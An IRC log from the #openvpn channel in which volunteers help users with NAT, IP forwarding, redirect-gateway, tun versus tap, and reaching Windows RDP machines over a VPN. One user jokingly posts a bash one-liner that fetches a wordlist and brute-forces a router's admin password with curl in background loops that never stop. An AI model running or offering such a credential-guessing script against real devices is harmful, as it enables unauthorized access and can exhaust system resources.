15:42 < pekster> Since you're doing NAT (line 23 in that paste) you don't need the return-route for the VPN network, but forwarding needs to be enabled on the server
15:43 < daemoen> it is enabled
15:43 < pekster> Assuming the traffic is going out eth0, of course
15:43 < daemoen> ec2 instance, only has eth0 and tun0 so yeah.
15:43 < daemoen> and ipv4 forwarding and promiscuous are enabled
15:44 < pekster> You don't want/need promisc
15:44 < daemoen> i have tried the classic nat method, and the proper routing methods
15:44 < daemoen> ive tried with and without :)
15:44 < daemoen> just in case
15:44 < pekster> Can the server ping the IP you're trying to reach from the client?
15:45 * daemoen facepalms
15:45 < daemoen> im gonna die if icmp is disabled
15:45 * daemoen sighs and shakes his head
15:46 < daemoen> ok, ignore me, im an id10t today it seems
15:46 < pekster> Some traceroute tools let you trace to an IP on an arbitrary port/protocol, which is great for tracing to things that don't ping or have the "standard" UDP traceroute ports open
15:47 * daemoen nods
15:48 < daemoen> so sorry, hadnt even thought that icmp wasnt enabled on the machines, heh. its the most basic of tshooting...... its laughable when youre using ping to test... and then realize that ssh is working fine after the fact..
15:52 < pekster> I once blamed an ISP for connectivity when it turned out a lightning strike damaged the physical TX part of a NIC, but not the RX.
So, software says the DHCP request goes out, tcpdump sees that and all the other customers' replies, but the TX never goes down the wire ;)
15:53 < pekster> Try that on for "things you might miss when troubleshooting"
15:53 < daemoen> ouch
15:53 < daemoen> that would be a .... yeah
15:55 < pekster> When I knew what to look for, there was a stack trace in the kernel log, but that's not exactly the first place you look when dhcp requests don't come back :P
15:55 < daemoen> lol
15:56 -!- bjh4 [~bjh4@12.104.148.2] has joined #openvpn
16:00 -!- troker [~troker@bou62-129-63-62-124.dhcp.uml.edu] has joined #openvpn
16:10 -!- KaiForce [~chatzilla@adsl-70-228-90-247.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 18.0.2/20130201065344]]
16:21 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has joined #openvpn
16:24 < troker> My routing table (after I run my vpn config) looks like this - http://pastebin.com/raw.php?i=yKKueYjS -- tun0's gateway is "link#10", I am unfamiliar with this. Does this mean that when openVPN set up the connection it didn't create a default gateway for the interface?
16:37 -!- nahmaste [~namaste@c-69-181-131-136.hsd1.ca.comcast.net] has quit [Quit: bai]
16:39 -!- cdnl [~cdnl@li284-140.members.linode.com] has joined #openvpn
16:39 -!- eN_Joy [~zhou3594@jindan.chem.ou.edu] has joined #openvpn
16:40 < cdnl> I accidentally deleted /etc/init.d/openvpn
16:41 < pekster> Your distro package should have that file
16:41 < pekster> Most distros make changes from the sample initscript
16:41 < cdnl> where would I find it (centos 6.3)
16:42 < pekster> Ideally the backups of your system that you keep. Failing that, the RPM.
I don't know enough about how RHEL/CentOS does builds to know if the file is inside the tarball, or if they patch it during the build process
16:43 < pekster> Maybe reinstalling the openvpn package over itself will put it back
16:43 < pekster> And in the future, you should be a lot more careful as root
16:43 < eN_Joy> i just recently re-built my box, it was a gentoo but now ubuntu 12.10, when i do ifconfig, i don't see a tun interface, however i do see that tun driver is loaded and there's an entry in /dev/net/tun, what should i look for next? thanks
16:44 < pekster> eN_Joy: Look for world peace next? openvpn creates the tun devices automatically; if you know that you need persistent devices for some reason, create it by hand or read your distro docs on network setup
16:46 < eN_Joy> pekster: lol, when i try to test my config file (that was used before) i got TCP/UDP: Socket bind failed on local address [undef]: Address already in use, then I thought tun0 might be the problem
16:48 < pekster> Nope
16:49 < pekster> The error clearly says it couldn't bind to the address, so you've selected a bad IP/port to bind to (port or local directive probably)
16:49 < pekster> Or something else is already listening there
16:49 < eN_Joy> pekster: yeah, forgot to uncomment the first directive in my config file "local a,b,c,d"...
16:50 < eN_Joy> do i set that to 127.0.0.1 or 0.0.0.0?
16:50 < pekster> The IP you wish to listen on, or leave it blank to listen on the wildcard address
16:54 -!- p3rror [~mezgani@2001:0:53aa:64c:c41:26b2:d606:a524] has quit [Ping timeout: 245 seconds]
16:55 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
16:57 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
17:01 -!- cdnl [~cdnl@li284-140.members.linode.com] has quit [Ping timeout: 256 seconds]
17:02 -!- dioz [~dioz@2001:470:d:e3::1] has quit [Read error: Connection reset by peer]
17:04 -!- dazo [~dazo@openvpn/community/developer/dazo] has quit [Ping timeout: 245 seconds]
17:04 -!- APTX [APTX@unaffiliated/aptx] has quit [Remote host closed the connection]
17:05 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has quit [Ping timeout: 245 seconds]
17:05 -!- kenyon [kenyon@darwin.kenyonralph.com] has quit [Ping timeout: 245 seconds]
17:05 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Ping timeout: 276 seconds]
17:05 -!- hazardous [~dbn@openvpn/user/hazardous] has quit [Remote host closed the connection]
17:06 -!- NuclearMeltdown [~rep@unaffiliated/antiliberal] has quit [Ping timeout: 276 seconds]
17:06 -!- EugeneKay [eugene@madeitwor.se] has quit [Ping timeout: 276 seconds]
17:06 -!- APTX [APTX@unaffiliated/aptx] has joined #openvpn
17:08 -!- EugeneKay [eugene@madeitwor.se] has joined #openvpn
17:08 -!- NuclearMeltdown [~rep@AntiLiberal-1-pt.tunnel.tserv9.chi1.ipv6.he.net] has joined #openvpn
17:08 -!- dioz [~dioz@2001:470:d:e3::1] has joined #openvpn
17:09 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn
17:11 -!- kenyon [kenyon@darwin.kenyonralph.com] has joined #openvpn
17:11 -!- hazardous [~dbn@void.kassad.in] has joined #openvpn
17:12 -!- Shway [~Shway@216.208.252.66] has joined #openvpn
17:12 -!- dxtr [~dxtr@unaffiliated/dxtr] has quit [Ping timeout: 276 seconds]
17:12 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has joined #openvpn
17:15 -!- Shway [~Shway@216.208.252.66] has left #openvpn []
17:18 -!- p3rror [~mezgani@2001:0:53aa:64c:cf4:1749:d606:a524] has joined #openvpn
18:05 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn
18:06 -!- Cpt_Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
18:08 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 252 seconds]
18:09 -!- Shway [~Shway@216.208.252.66] has joined #openvpn
18:14 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
18:16 < Shway> Hello, I am working the Amazon EC2 OpenVPN v2.3 I used the Amazon AMI and am stuck. I need to create a "general user" account to get past the login page as my RADIUS username and password are not working. HOWEVER there is nowhere to provide the newly created user in the OpenVPN Admin UI a password. I could really use some help on this.
18:17 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection]
18:18 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn
18:18 -!- Kireji [~nospam@biocontact.org] has joined #openvpn
18:20 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
18:20 -!- pnielsen [pnielsen@2a01:7e00::f03c:91ff:fedf:3a21] has quit [Read error: Connection reset by peer]
18:20 -!- pnielsen [pnielsen@2a01:7e00::f03c:91ff:fedf:3a21] has joined #openvpn
18:21 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Ping timeout: 245 seconds]
18:21 < Kireji> I set up openvpn server on a remote 1U, and tunnelblick on a local osx box. I can get tunnelblick to connect, but connections are not going through the VPN
18:21 -!- gardar [~gardar@gardar.net] has quit [Quit: bye!]
18:21 < Kireji> according to
18:21 < Kireji> https://code.google.com/p/tunnelblick/wiki/cFAQ#How_do_I_know_the_VPN_is_working?
18:21 <@vpnHelper> Title: cFAQ - tunnelblick - Frequently Asked Questions - OpenVPN GUI for Mac OS X - Google Project Hosting (at code.google.com)
18:21 < Kireji> I have to add redirect-gateway def1 to the osx config, but when I do, no network connections happen at all
18:22 < pekster> !redirect
18:22 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
18:22 <@vpnHelper> http://ircpimps.org/redirect.png
18:22 -!- gardar [~gardar@gardar.net] has joined #openvpn
18:22 -!- Shway [~Shway@216.208.252.66] has quit [Quit: HydraIRC -> http://www.hydrairc.com <- In tests, 0x09 out of 0x0A l33t h4x0rz prefer it :)]
18:23 -!- EvilJStoker [jstoker@unaffiliated/jstoker] has quit [Excess Flood]
18:25 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Ping timeout: 248 seconds]
18:25 < Kireji> is "--redirect-gateway" the same as the line "redirect-gateway def1" in the file config.ovpn ?
18:25 < kisom> Kireji: Yes, with the def1 flag set.
18:26 -!- JackWinter [~jack@ppp-256.vo.lu] has quit [Ping timeout: 260 seconds]
18:26 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn
18:27 -!- EvilJStoker [jstoker@unaffiliated/jstoker] has joined #openvpn
18:27 < Kireji> "is ip forwarding enabled" - is this in the client (tunnelblick) or on the openvpn server?
18:27 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn
18:27 < Kireji> /etc/openvpn/server.conf doesn't have any line about ip forwarding
18:28 < Kireji> !ipforward
18:28 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall
18:29 < Kireji> so I set up tun on the server
18:30 < Kireji> followed instructions on https://help.ubuntu.com/12.04/serverguide/openvpn.html
18:30 <@vpnHelper> Title: OpenVPN (at help.ubuntu.com)
18:31 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn
18:32 -!- EvilJStoker [jstoker@unaffiliated/jstoker] has quit [Excess Flood]
18:32 < Kireji> for what I want, I don't think I need a bridged VPN mode, but I'm not sure
18:32 < pekster> That guide completely fails to mention OS-level IP forwarding
18:33 < pekster> Use the info the bot gave you
18:33 < pekster> openvpn doesn't replace your OSes routing and firewall operations, just connects the clients & server together
18:34 < Kireji> !linipforward
18:34 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT
18:34 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.]
18:35 < Kireji> grrr
18:37 < Kireji> it appears the use case I'm expecting - the ability to connect to the server and get outside network connectivity is not really what openvpn does then?
18:37 < Kireji> I'll need to muck with "iptables -I FORWARD -i tun+ -j ACCEPT" and "/sbin/ip link set "$ETHDEV" promisc on" ...? that gets me beyond what I understand wrt to networking
18:38 < Kireji> and turning different network adapters into promiscuous mode doesn't seem right
18:39 -!- p3rror [~mezgani@2001:0:53aa:64c:cf4:1749:d606:a524] has quit [Remote host closed the connection]
18:40 -!- p3rror [~mezgani@2001:0:53aa:64c:cf4:1749:d606:a524] has joined #openvpn
18:42 -!- goldkatze [~nobody@unaffiliated/goldkatze] has quit [Ping timeout: 248 seconds]
18:42 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn
18:45 < Kireji> is there a place online I can read more about linipforward? I need to understand this better to get my setup working
18:46 < pekster> OpenVPN is quite able to work in a redirection-based setup (this is why the bot gives you a cute flowchart to get it working)
18:46 < pekster> Don't use promisc; it won't help you
18:46 < pekster> !tcpip
18:46 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know
18:46 < pekster> Without an understanding of routing and firewalling, openvpn won't be a lot of use to you
18:48 < Kireji> I have some basic understanding, and want to get it working
18:48 < Kireji> http://openvpn.net/index.php/open-source/documentation/howto.html has a different iptables command
18:48 <@vpnHelper> Title: HOWTO (at openvpn.net)
18:48 < Kireji> "iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE"
18:49 < Kireji> I've used iptables in the past, I just don't have a deep understanding of what it's really doing
18:50 < kisom> Kireji: It created a NAT for your VPN adapter and forwards it to the eth0 adapter.
18:50 < daemoen> Kireji: in this case, youre masquerading the ip address that request are coming from, its a dirty hack 18:50 < kisom> Please don't kill me for that dumbed down explanation :) 18:51 < daemoen> kisom: how dumbed down you get depends on the person youre talking to. ive seen it go much dumber than that =D 18:52 < Kireji> I'm off to dinner, and I really, really appreciate yout help. I'll have to work on this later. 18:52 < Kireji> no dirty hacks. and I'm willing to read and learn to get it working 18:53 < kisom> Kireji: Then you need routable IP-addresses, which I assume you don't have 18:53 < Kireji> I want to use my 1U in a colo to create a VPN, and be able to connect to it from my laptop, and tunnel all my connections through it 18:53 < Kireji> routable IP-addresses on the server? 18:53 < daemoen> Kireji: ok, bridged or routed topology ? 18:53 < Kireji> I don't know 18:53 < pekster> it's routed 18:53 < daemoen> ie: are you in a shared network environment, or is the network stack yours isolated 18:54 < Kireji> I don't fully understand the trad off there 18:54 < pekster> rfc1918 is the correct use-case here, unless you plan on buying a block of public IPv4 IPs for some silly reason 18:54 < Kireji> the server has it's own IP, on a switch 18:54 < kisom> Kireji: In short, use NAT. The whole world does. 18:54 < Kireji> there's only 1 IP on one (1U) server hosting the openvpn service 18:55 < daemoen> pekster: whats wrong with bridging the private network to tunnel through the private gateway ? 18:55 -!- EvilJStoker [jstoker@unaffiliated/jstoker] has joined #openvpn 18:56 < pekster> huh? What on earth is the use-case? 18:56 < Kireji> NAT meaning the openVPN server acts like a NAT on a router - and translates requests when they come in from the client - sends them out and re-translates them back once they return before sending them back to the client? 18:56 < pekster> He's interested in passing L3 traffic. 
Linking Ethernet traffic is not only pointless, but stupid if you connect it to the home LAN too since ARPs traverse the VPN, plus any other broadcasts (windows boxes, etc, etc) 18:56 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux] 18:57 < pekster> Don't suggest bridging just "becuase" -- that's a terriable reason 18:57 < Kireji> kisom: you say use NAT, daemoen: above wrote it's a dirty hack 18:57 < pekster> !tunortap 18:57 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 18:57 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun. 18:57 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 18:57 < kisom> Kireji: Because it really is a dirty hack, but everyone is still using it. 18:57 < pekster> NAT is a "dirty hack" that (nearly) ever home network uses to get Internet. It's not going away until ipv6 is native everywhere 18:57 < kisom> Not only home users. 18:58 < Kireji> oooohh - you mean *NAT* is a hack. of course 18:58 < pekster> Well, yes. but them in particular 18:58 < daemoen> pekster: or until most people figure out how to use 6in4 18:58 < pekster> Yea, I just got a sixxs tunnel a couple weeks ago 18:58 < pekster> <3 18:58 < Kireji> I thought you meant using "NAT" for this application / making the VPN to work is a hack 18:58 * daemoen nods. 
18:58 < daemoen> I spent the past weekend arguing with my juniper config to get my HE 6in4 tunnel working at home 18:59 < daemoen> unfortunately they *still* dont support dhcpv6 client prefix delegation which is needed for me to use my isps native ipv6 stack 18:59 < Kireji> I'm not going for purity of network protocol idealism here, I want a reliable, secure solution to tunnel all my traffic through 18:59 < pekster> Kireji: You want a routed, rfc1918 ipv4 connection to your server, with NAT, ipforwarding, and forwarded traffic through the firewall 18:59 < kisom> Kireji: what he said ^ 18:59 < pekster> Kireji: Everything you need is found starting at the !redirect reply of the bot. Read that, the flowchart, the linked references, and the manpage. Come back if you get stuck *after* all that, and a web search gives you not enough to help yourself 19:00 < Kireji> pekster: cool. I'm about 1/2 way there I think 19:00 < Kireji> ok 19:00 < Kireji> tonight. thank you all 19:00 < Kireji> \afk 19:00 < pekster> daemoen: Your router doesn't support your ISPs PD, that is? 19:00 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 19:01 < daemoen> pekster: no SLAAC, so I have to be able to grab my public /64 prefix via dhcp, and then RA it (so im both a client and a server) 19:01 < daemoen> drives me nuts that comcast is only using dhcpv6 atm 19:03 < pekster> Hmm, someone in #ipv6 posted an RA from their Comcast, so that's gotta be local to your area 19:03 < daemoen> hmmmm 19:04 < pekster> Can't you not do dhcpv6 without an RA anyway? IIRC you need the RA to get the router configured (dhcpv6 won't do that, just addressing.) 
19:04 * daemoen goes to investigate #ipv6 19:04 < daemoen> pekster: correct, but i cant get my prefix without the dhcpv6 19:04 < daemoen> thats the issue im having 19:04 < daemoen> is getting the prefix/address assignments 19:05 < daemoen> and since they are not static, but rather dynamic (which i still find to be stupid), i have to client to grab it before RA, unless they did finally implement SLAAC 19:11 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 256 seconds] 19:12 < daemoen> pekster: i am curious why masquerade as opposed to routing though (in case of Kireji or anyone else for that matter). don't have to have a bunch of ips, just have a different subnet, which is the default. most people just use masquerade... which i dont understand why (other than its easier than doing proper routing) 19:13 < pekster> You can't route rfc1918.. 19:14 < pekster> Again, you need public IPs to route on the public Internet. People "playing around with" OpenVPN are not gunna go ask their hosted ISP for a /24 to do so 19:20 -!- dxtr [~dxtr@unaffiliated/dxtr] has joined #openvpn 19:21 -!- dazo_afk [~dazo@openvpn/community/developer/dazo] has joined #openvpn 19:21 -!- mode/#openvpn [+o dazo_afk] by ChanServ 19:21 -!- dazo_afk is now known as dazo 19:22 -!- troker [~troker@bou62-129-63-62-124.dhcp.uml.edu] has quit [Quit: troker] 19:44 -!- raidz is now known as raidz_away 19:44 -!- AsadH is now known as zz_AsadH 19:50 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 19:50 -!- mode/#openvpn [+o krzee] by ChanServ 19:52 -!- bjh4 [~bjh4@12.104.148.2] has quit [Quit: Leaving] 20:16 -!- Cpt_Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 20:28 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 255 seconds] 20:28 -!- Wintereise [~reise@unaffiliated/wintereise] has joined #openvpn 20:50 -!- Aketzu [akolehma@kelvin.aketzu.net] has quit [Ping timeout: 264 seconds] 20:51 -!- Aketzu [akolehma@kelvin.aketzu.net] 
has joined #openvpn 20:56 -!- p3rror [~mezgani@2001:0:53aa:64c:cf4:1749:d606:a524] has quit [Ping timeout: 245 seconds] 21:07 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 252 seconds] 21:19 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 21:24 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has joined #openvpn 21:30 -!- MeanderingCode_ [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 248 seconds] 21:44 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has quit [Remote host closed the connection] 21:45 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 21:55 < ngharo> haha friend is forgot his local router password 21:55 < ngharo> i got him to forkbomb himself pretty sure 21:55 < ngharo> HOST=192.168.0.1; while :; do for x in $(wget http://www.cotse.com/wordlists/english -O - 2>/dev/null | sort -R); do if [ -n "$(curl --user "admin:$x" --head -q $HOST 2>/dev/null | grep -e 'HTTP.\+ 200')" ]; then echo "$HOST > admin:$x"; fi done & done 21:55 <@vpnHelper> Title: Privacy Service (at www.cotse.com) 21:56 < ngharo> the most crude brute force evar!! 21:57 < pekster> You could have done something more useful like link your friend to http://keepass.inf 21:57 < pekster> http://keepass.info 21:57 <@vpnHelper> Title: KeePass Password Safe (at keepass.info) 21:58 < ngharo> i'll do that when he finds the password ;) 21:59 < pekster> Just reset the stupid password 21:59 -!- MeanderingCode_ [~Meanderin@71-213-175-106.albq.qwest.net] has joined #openvpn 21:59 < pekster> Better yet, run a real OS on there so one can ssh in via pubkeys without passwords (except perhaps one you type to decrypt the local key...) 
21:59 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 256 seconds] 22:09 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer] 22:19 -!- setuid [~setuid@99-16-210-3.lightspeed.drbyct.sbcglobal.net] has joined #openvpn 22:21 -!- TypoNe [~itsme@195.197.184.87] has quit [Ping timeout: 246 seconds] 22:21 < setuid> I'm attempting to secure several internal (LAN-side) Windows RDP sessions, so I can attach/manage them directly via the live Internet. I've installed OpenVPN on the Windows side, but… that's it. There's nothing out there describing how to configure OpenVPN to route RDP over that connection. 22:21 < setuid> Has anyone done this before? 22:22 < pekster> I'm sure "someone" has done that before. You want to run OpenVPN on one of the LAN systems and expose the entire LAN to VPN clients? 22:23 < setuid> nope, I want to be able to pinhole from the Internet through my routers to each Windows machine, in a secure, tunneled fashion 22:24 < pekster> So you want a separate openvpn instance on each server? That sounds slightly less than ideal, but you can do that too I suppose 22:24 -!- TypoNe [~itsme@195.197.184.87] has joined #openvpn 22:24 < pekster> If you have an always-on system, it's a lot cleaner to do that with just 1 server though 22:24 < setuid> That's one idea, or just one instance exposing my internal 10.0.1.x to the tunnel 22:25 < setuid> All of my servers, laptops, etc. are on all the time, about 15 machines here. 22:25 < pekster> Right, so you want exactly what I said initially 22:25 < setuid> I have a big block of static IPs, so I can tunnel through if I need to 22:25 < pekster> You need to get your VPN running to the point that you can connect to it and ping the VPN IP of the server. Start here: 22:26 < pekster> !howto 22:26 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! 
or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 22:26 < pekster> Then when you have that working, you can expose the server-side LAN to clients with this info: 22:26 < pekster> !serverlan 22:26 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 22:39 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn 22:40 < setuid> Do I have to set up my own CA? Or is there one that can sign my keys externally? 22:40 < pekster> You set up your own CA 22:41 < pekster> Besides the CA, you only need a keypair for each client plus the server 22:42 < pekster> You can even authenticate users based on passwords, although you need a backend infrastructure to do that with (a script that validates them, or through use of the PAM plugin for Linux) 22:43 < setuid> My use case is my MacBook Air in a coffee shop pinhole'ing back through my firewall to my Windows laptops inside my office. 22:43 < setuid> So mac client, using Remote Desktop over the VPN to communicate with Windows laptops inside my 10.0.1.x internal LAN 22:44 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 22:44 < pekster> You can do whatever IP can. 
RDP is no different than pings or streaming webcam from your cat tower 22:45 < pekster> And yes, OpenVPN can transport $arbitrary_protocol over the tunnel just fine 22:46 < pekster> You may want to re-number your LAN, since some coffee shops may use that same network range (if your home network collides with a remote one, it'll cause you issues) 22:46 < setuid> Renumbering is not an option 22:46 < setuid> My internal lag cannot be moved away from 10.0.1.x, in fact, AT&T took away the ability to use that on their routers, so I had to add a second router behind theirs, to continue to function. 22:47 < pekster> Then it's possible you may have conflicts, although it's likely to be somewhat rare (I think 10.0.0/24 is more popular) 22:49 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 22:54 < setuid> Seems like setting this up is a prohibitively complex task, especially on Windows 22:56 < EugeneKay> Get a less shitty ISP. 22:57 < pekster> I'm not sure the IP is the problem if his/her own router is behind the crappy ISP unit 22:57 < pekster> but w/e 22:58 < setuid> EugeneKay, WIsh I could, but unfortunately in this half of my state, AT&T is the only option 22:58 -!- eN_Joy [~zhou3594@jindan.chem.ou.edu] has quit [Quit: leaving] 23:03 -!- setuid [~setuid@99-16-210-3.lightspeed.drbyct.sbcglobal.net] has quit [Quit: sleep calls] 23:37 -!- brute11k [~brute11k@89.249.235.89] has joined #openvpn 23:38 -!- brute11k1 [~brute11k@89.249.235.89] has quit [Ping timeout: 245 seconds] --- Day changed Fri Feb 15 2013 00:30 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 01:07 -!- b1rkh0ff [~b1rkh0ff@178.77.1.72] has quit [Ping timeout: 256 seconds] 01:20 -!- b1rkh0ff [~b1rkh0ff@178.77.18.35] has joined #openvpn 01:49 < daemoen> hey guys, anyone happen to know if mountain lion is busted again as far as dhcp dns and openvpn is concerned... 
it was at one point working, but doesnt seem to be now 01:50 < daemoen> figured someone might know =) 01:59 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 02:45 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 255 seconds] 02:45 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 02:52 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 02:54 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Client Quit] 03:10 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 03:12 -!- zz_AsadH is now known as AsadH 03:16 -!- scoates [~sean@iconoclast.caedmon.net] has quit [Ping timeout: 255 seconds] 03:30 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 03:35 -!- NChief [tomme@unaffiliated/nchief] has quit [Ping timeout: 260 seconds] 03:36 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 04:02 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 04:03 -!- brute11k1 [~brute11k@89.249.235.89] has joined #openvpn 04:03 -!- brute11k [~brute11k@89.249.235.89] has quit [Ping timeout: 264 seconds] 04:05 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 260 seconds] 04:07 -!- brute11k1 [~brute11k@89.249.235.89] has quit [Ping timeout: 248 seconds] 04:07 -!- brute11k [~brute11k@89.249.235.89] has joined #openvpn 04:08 -!- ade_b [~Ade@195.198.34.212] has joined #openvpn 04:08 -!- ade_b [~Ade@195.198.34.212] has quit [Changing host] 04:08 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 04:12 -!- brute11k1 [~brute11k@89.249.235.89] has joined #openvpn 04:12 -!- brute11k [~brute11k@89.249.235.89] has quit [Ping timeout: 240 seconds] 04:14 -!- brute11k [~brute11k@89.249.235.89] has joined #openvpn 04:16 -!- brute11k1 [~brute11k@89.249.235.89] has quit [Ping timeout: 255 seconds] 04:26 -!- goldkatze [~nobody@unaffiliated/goldkatze] has joined #openvpn 04:30 -!- MariusIT [~userit@86.120.191.55] has quit [Ping timeout: 252 
seconds] 04:37 -!- ||arifaX [~quassel@unaffiliated/arifax/x-427475] has joined #openvpn 04:38 -!- MariusIT [~userit@86.120.191.55] has joined #openvpn 04:45 -!- MariusIT [~userit@86.120.191.55] has quit [Ping timeout: 248 seconds] 04:50 -!- MariusIT [~userit@86.120.191.55] has joined #openvpn 05:09 -!- brute11k [~brute11k@89.249.235.89] has quit [Ping timeout: 256 seconds] 05:10 -!- brute11k [~brute11k@89.249.235.89] has joined #openvpn 05:11 -!- MariusIT2 [~userit@86.120.191.55] has joined #openvpn 05:12 -!- MariusIT [~userit@86.120.191.55] has quit [Ping timeout: 248 seconds] 05:12 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 05:25 -!- ||arifaX [~quassel@unaffiliated/arifax/x-427475] has quit [Quit: http://quassel-irc.org - Chat comfortably. Anywhere.] 05:35 -!- NChief [tomme@unaffiliated/nchief] has joined #openvpn 05:48 -!- xbanux [~xbanux@115.254.75.113] has joined #openvpn 05:50 -!- knobo [~bohmer@81.175.44.217] has quit [Remote host closed the connection] 06:41 -!- p3rror [~mezgani@2001:0:53aa:64c:1081:387a:d607:9373] has joined #openvpn 06:44 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 260 seconds] 06:46 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 07:01 -!- amir [~amir@unaffiliated/amir] has quit [Remote host closed the connection] 07:01 -!- master_of_master [~master_of@p57B52CEE.dip.t-dialin.net] has quit [Read error: Operation timed out] 07:05 -!- master_of_master [~master_of@p57B54A92.dip.t-dialin.net] has joined #openvpn 07:05 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 07:08 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 07:21 -!- p3rror 